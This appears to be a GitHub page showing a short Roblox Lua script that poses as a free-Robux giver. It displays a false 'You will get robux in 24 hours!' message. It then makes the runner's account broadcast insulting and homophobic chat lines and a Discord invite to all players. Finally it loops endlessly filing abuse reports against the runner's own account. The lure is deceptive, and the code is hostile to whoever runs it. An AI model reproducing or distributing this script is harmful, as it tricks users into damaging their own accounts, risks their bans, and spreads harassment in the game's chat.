-
Notifications
You must be signed in to change notification settings - Fork 0
/
hi
48 lines (32 loc) · 996 Bytes
/
hi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
robux = 50000
name = game.Players.LocalPlayer.Name
print(name)
msg = Instance.new("Message",workspace)
msg.Name = "RobuxScript"
msg.Text = "You will get robux in 24 hours!"
wait(5)
workspace.RobuxScript:Destroy()
local args = {
[1] = "gay",
[2] = "All"
}
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
local args = {
[1] = "v0.1",
[2] = "All"
}
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
local args = {
[1] = "furries = bad",
[2] = "All"
}
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
local args = {
[1] = "discord.gg/j4j",
[2] = "All"
}
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
while wait() do
game.Players:ReportAbuse(game.Players.LocalPlayer, "Bullying", "gay")
print("Report sent!")
end